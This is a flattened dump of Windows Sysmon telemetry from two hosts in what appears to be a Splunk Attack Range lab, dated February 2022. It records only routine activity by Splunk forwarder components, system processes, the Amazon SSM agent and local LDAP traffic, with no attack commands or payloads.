11:25:02.058{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-198E-6216-6907-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.060{C8EA50B7-198E-6216-6907-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DDA0F8BFD1C2EC8D146F5761CAFFBCE,SHA256=F2DFB82EE51DAF90A59D8C5542A7500B900D9EC93828593E728E4E393D7A8E8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:03.119{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64D0564516CCA68E1429E70C119F08C,SHA256=0EDE218EBA3D29D45B5F06D168F4685339100EEE1D6B67858B71E43C4D5445CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.673{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-198F-6216-6A07-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.671{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.671{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.671{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.671{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.670{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-198F-6216-6A07-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.670{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-198F-6216-6A07-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.668{C8EA50B7-198F-6216-6A07-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:04.835{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB855A58C68471CD3A5D399FEBF02D17,SHA256=D9694EC4AE0F679CE4E2B9CD9E3A2B3BB5AC22E2B60ED77615B19E1135C16C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:04.166{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFEE5640080B1F8A2B655C46CFD57709,SHA256=4C0BBC94FEFC21B06FD51FC51C232AA7D1C8B6DC5568F7466615C72DADF55D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:05.851{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79BF936C773882B9D0D42097C0C8F816,SHA256=C825750FF97079206D2767BC507BA0B121C2D7DD7DEEA81D7D2E6E358224F812,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:05.384{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EEB9606B0068A913F2B18FF20D18E6,SHA256=134FE91A3433C6ABE345CC4D3D5C88302DADFDEA100F0999C3021EADD3987FD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.666{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49576-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:06.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1587AEE183661001D56ED64A913F5BFE,SHA256=D943B90A3F5299A0ACA57967EC40C1A5B83EA477906AA8F1B44917BA4F4827F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:06.509{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CBA85245E30C4E100E697A0E4DF98FA,SHA256=97BB14B7B17A68568D1D77F2D4A98FBDEE4D821E1454EA41DD2CAB1ADB04FAA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.567{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49577-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:03.567{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49577-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000222840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:03.528{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51743-false10.0.1.12-8000- 23542300x8000000000000000298995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:07.865{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B313DD7B5D2B1BB9C0AC28E78208E45,SHA256=ED984B30350620EFB710A32DBEC5DF23CA68C079732E1FE4A610D8A2BC7AD4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:07.744{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48146B130060F0E5FE52772023C632BF,SHA256=F3A56068CFE9E3C67DDCBE66EEC41A9E0470A35D3836B3BCE0616E7EEDB583B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:07.746{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-167MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:08.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D84D90A19C5B841554D1AC11C9900FE0,SHA256=396B2AE4566A5B525F9735A65B5215C1C99C1C535E554867617207F676BC372A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:08.775{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0410B9DB675DE8BEA100E8F717F9E353,SHA256=ADDB34F30E305EA848D9950C74D3A1E06AE4B1EA3468593AC3A7F089ABF0E96D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:08.741{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-168MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:09.892{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE607D6E8F94673D2BEA7600ECC6D6F3,SHA256=0022DE68039F11A04FD02B9DB477B32A992A4EAA5F6B8224225C6BC7B1CB0684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:09.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2BFE497ED13D2EBB795112ABA7DF8E,SHA256=107AFB17946C0CF017AEEC569B4B862F2C8D41F28249A7D2C2C94E2E62ECC1EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:10.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=085EAA5E08316A2B7B66E14B7DEA71B7,SHA256=F1A0C6686783B17460BF0D9C53AD6FA5DC1D1E3CC2334EC69EF605A1A5B86979,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:08.622{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51744-false10.0.1.12-8000- 23542300x8000000000000000222845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:10.806{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A283FCAD1CA08670E36B78B80A1E4A5A,SHA256=6A72058ECFE1899E34C417C27286A2C51E96B9189696C4583AD4B8ECFFD5EDED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:11.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F14E7526BF00255A4654DE1BCBF1C4A6,SHA256=FA24C37040AB8EB479E2BCD01A8D8C738B24510827D4277DCFD7297B0CD3B1AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:11.822{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE9C47E0AF9119F4D4EF4CB20917173,SHA256=0371E50E884BA1970A42E2982A14070E61AFA43506A3039A425AAB90DFDCCB03,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:08.601{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49578-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:12.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3761A97758E7C1BAC8648B3D235B0301,SHA256=0CD93F66649F724435B2FA972E15D9BF9350FF8045627D37A0FFED677C45E15C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:12.822{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCC33A44CC2A5E75C431C3DD7489762,SHA256=85C8930B39D812AD0EFEB7AD1017740A68956E0804EE1A2DA0A16DEC75467089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:13.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7883D3DE596B733E37A8A313034E96C9,SHA256=04586A2C8F70DF003DB3F8DB61CC486B9B145312F8041BE0A190F0D0884605AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:13.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7BC08307F1CB2DFEED3BAE799D35240,SHA256=8C472A50FA99ECA98AB7EA8444FF21490935A5FDEBDB4D203CF7C0D0F32A3037,IMPHASH=00000000000000000000000000000000falsetrue 